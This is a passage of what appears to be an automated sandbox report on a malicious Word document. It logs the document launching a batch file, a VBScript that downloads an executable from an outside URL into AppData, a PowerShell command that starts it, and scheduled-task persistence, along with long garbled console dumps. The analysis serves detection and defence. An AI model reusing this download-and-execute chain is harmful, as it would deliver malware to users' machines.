Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....4.......p...............................l.o.s.e. . ...............3|..+.H.+......F.J....@.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................>.0.....4.......p............................... . ...............3|..+...3|..+.P.+........J....H.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p...#............................... . ...............3|..3|..+.....Z....E.J....D.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...)...............................@F.J.........F.J...}..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...H...........................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p...T.............................I.<..J.....b.v...u`.....+...+.....R.............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...Z.............................+...+.....R.............3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+...I.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...q...........................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p...}.............................I.<..J.....b.v...u`.....+...+.....R.............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p.................................+...+.....R.............3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+...I.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p.................................I.<..J.....b.v...u`.....+...+.....R.............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p.................................+...+.....R.............3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+...I.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p.................................I.<..J.....b.v...u`.....+...+.....R.............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p.................................+...+.....R.............3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+...I.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p.................................I.<..J.....b.v...u`.....+...+.....R.............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p.................................+...+.....R.............3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+...I.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.s.c.r.i.p.t...p...!.............................I.<..J.....b.v...u`.....+...+.d.+...............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p...'.....................................I.<..J.....b.v..3|..+..........E.J....T.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...-...............................................@F.J..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.>.........8.+....v@..J.?I...............+...+.(...|.+...\u\.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................8.5.8.2.3.4.5.7.1.3.2.6.9.4.9.3.8.1.6.4.7.3.8.5.1.4.8.8......b.v...u\.....+...+.d.+.8.............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p.................................+...+.|.\.8...|.\.......3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+...I.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................8.9.8.4.9.7.2.6.8.6.1.6.9.8.6.3.7.4.9.2.7.3.6.8.1.2.1.8......b.v...u\.....+...+.d.+.8.............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p.................................+...+.|.\.8...|.\.......3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+...I.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................5.5.4.7.9.3.4.1.9.1.6.5.1.7.1.5.9.6.2.9.9.1.6.3.9.5.9.6......b.v...u\.....+...+.d.+.8.............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p.................................+...+.|.\.8...|.\.......3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+...I.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................9.8.3.3.6.9.8.6.9.5.7.5.3.9.1.5.7.2.8.6.3.9.5.3.1.8.2.6......b.v...u\.....+...+.d.+.8.............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...-.............................+...+.|.\.8...|.\.......3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+...I.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...D...........................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................9.2.6.8.8.8.1.4.1.9.8.8.2.9.8.9.9.9.9.5.8.3.3.3.6.8.7.1......b.v...u\.....+...+.d.+.8.............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...V.............................+...+.|.\.8...|.\.......3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+...I.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...m...........................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................b.r.e.a.k.......p...y.............................I.<..J.....b.v...u\.....+...+.d.+...............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....4.......p...............................y.........................3|..+.H.+......F.J....@.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p.....................................................3|..3|..+.....Z....E.J....D.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...................................@F.J.........F.J...}..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................6.6.8.7.2.9.5.4.4.6.7.6.3.6.3.5.7.9.9.3.3.6.8.2.1.7.6.4......b.v...u\.....+...+.d.+.8.............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p.................................+...+.|.\.8...|.\.......3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+...I.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................6.1.8.4.5.1.2.1.5.8.4.4.3.8.8.5.7.1.4.7.5.3.4.3.9.3.4.5......b.v...u\.....+...+.d.+.8.............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p.................................+...+.|.\.8...|.\.......3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+...I.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................9.4.8.2.1.8.6.4.7.4.3.4.9.3.7.9.7.5.2.9.2.2.5.7.8.4.9.2......b.v...u\.....+...+.d.+.8.............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p.................................+...+.|.\.8...|.\.......3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+...I.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...%...........................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................6.7.2.5.6.8.4.1.6.1.2.1.1.6.8.1.9.6.4.9.3.4.5.7.2.9.2.4......b.v...u\.....+...+.d.+.8.............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...7.............................+...+.|.\.8...|.\.......3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+...I.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...N...........................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................p.o.w.e.r.s.h.e.l.l.Z.............................I.<..J.....b.v...u\.....+...+.d.+...............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p...`.....................................I.<..J.....b.v..3|..+..........E.J....T.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...f...............................................@F.J..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p.................................I.<..J.....b.v...u`.....+...+.....R.............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p.................................+...+.....R.............3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+...I.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p.................................I.<..J.....b.v...u`.....+...+.....R.............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p.................................+...+.....R.............3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+...I.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p.................................I.<..J.....b.v...u`.....+...+.....R.............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p.................................+...+.....R.............3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+...I.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p.................................I.<..J.....b.v...u`.....+...+.....R.............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p.................................+...+.....R.............3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+...I.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Might use command line argumentsShow sources
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCommand line argument: 81925_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCommand line argument: KERNEL32.DLL5_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCommand line argument: KERNEL32.DLL5_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCommand line argument: LoadResource5_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCommand line argument: KERNEL32.DLL5_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCommand line argument: SizeofResource5_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCommand line argument: KERNEL32.DLL5_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCommand line argument: LockResource5_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCommand line argument: KERNEL32.DLL5_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCommand line argument: KERNEL32.DLL5_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCommand line argument: KERNEL32.DLL5_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCommand line argument: SkinTest5_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCommand line argument: 81927_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCommand line argument: KERNEL32.DLL7_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCommand line argument: KERNEL32.DLL7_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCommand line argument: LoadResource7_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCommand line argument: KERNEL32.DLL7_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCommand line argument: SizeofResource7_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCommand line argument: KERNEL32.DLL7_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCommand line argument: LockResource7_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCommand line argument: KERNEL32.DLL7_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCommand line argument: KERNEL32.DLL7_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCommand line argument: KERNEL32.DLL7_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCommand line argument: SkinTest7_2_00401069
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Queries a list of all open handlesShow sources
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeSystem information queried: HandleInformationJump to behavior
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\System32\cscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Reads the hosts fileShow sources
Source: C:\Windows\System32\cscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\cscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\DiskDrive\1\Volume\BackFiles\errorfix.bat
Source: unknownProcess created: C:\Windows\System32\cscript.exe cscript //nologo C:\DiskDrive\1\Volume\BackFiles\pinumber.vbs http://ictd.ae/YAS17.exe C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C Sleep -s 4;Saps 'C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe'
Source: unknownProcess created: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe 'C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe'
Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {2CBEE7D8-86F5-4B24-91AD-6F75657A40AB} S-1-5-18:NT AUTHORITY\System:Service:
Source: unknownProcess created: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\DiskDrive\1\Volume\BackFiles\errorfix.batJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript //nologo C:\DiskDrive\1\Volume\BackFiles\pinumber.vbs http://ictd.ae/YAS17.exe C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C Sleep -s 4;Saps 'C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe 'C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe' Jump to behavior
Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe Jump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\System32\cscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Writes ini filesShow sources
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeFile written: C:\Users\user\AppData\Roaming\List15\settings.iniJump to behavior
Executable creates window controls seldom found in malwareShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWindow found: window name: SysTabControl32Jump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dllJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: c:\Users\User\Desktop\2008\4.3.20\SkinStyle_src\SkinTest\Release\SkinTest.pdb source: cscript.exe, 00000003.00000003.1060252329.00342000.00000004.00000001.sdmp, ZXTRTU.exe, 00000005.00000002.1134644215.00409000.00000002.00020000.sdmp, ZXTRTU.exe, 00000007.00000002.1488966051.00409000.00000002.00020000.sdmp, ZXTRTU.exe.3.dr
Document has a 'subject' value indicative of goodwareShow sources
Source: 98.docInitial sample: OLE summary subject = arsrrxlh
Document has a 'vbamacros' value indicative of goodwareShow sources
Source: 98.docInitial sample: OLE indicators vbamacros = False
Document has an 'encrypted' value indicative of goodwareShow sources
Source: 98.docInitial sample: OLE indicators encrypted = True

Data Obfuscation:

barindex
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_005A9CE0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_005A9CE0
Uses code obfuscation techniques (call, push, ret)Show sources
<
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_00405431 push ecx; ret 5_2_00405444
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_00404B65 push ecx; ret 5_2_00404B78
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_005B8AA0 push eax; mov dword ptr [esp], 00000103h5_2_005B8AA2
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 7_2_00405431 push ecx; ret 7_2_00405444